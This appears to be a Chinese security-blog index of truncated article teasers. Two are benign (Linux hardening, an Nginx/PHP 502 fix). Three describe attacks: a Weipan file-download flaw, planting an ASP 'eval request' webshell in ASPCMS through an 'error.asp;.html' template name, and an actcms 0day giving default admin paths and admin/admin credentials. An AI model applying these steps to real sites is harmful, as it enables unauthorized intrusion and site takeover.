-
微盘(有条件)任意文件下载漏洞
简要描述:未验证文件所有者身份, 拿到具体文件信息之后可以直接下载, 但该信息并不易获取.详细说明:http://openapi.vdisk.me/?m=file&a=jump_to_s3&uid=UID&fid=F...
-
某牛的linux服务器安全设置
1.禁止ping/etc/rc.d/rc.localecho 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all 2.对用户和口令文件进行权限控制chmod 600 /etc/passwdchmod...
-
Nginx + PHP 5.2.17(FastCGI) 502 Bad Gateway错误
1、查看当前的PHP FastCGI进程数是否够用:netstat -anpo | grep “php-cgi” | wc -l 如果实际使用的”FastCGI进程数”接近预设的”...
-
最新ASPCMS系统后台拿webshell
点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写error.asp;.html,文件内容写一句话<%eval request(&ld...
-
actcms网站管理系统漏洞0day
作者: Liuker漏洞版本:actcms3.0以下版本默认后台路径:admin/默认数据库:App_Data/DataBase.mdb默认账户:admin默认密码: admin利用点:FCK编译器漏洞界面:admin/fckeditor/...
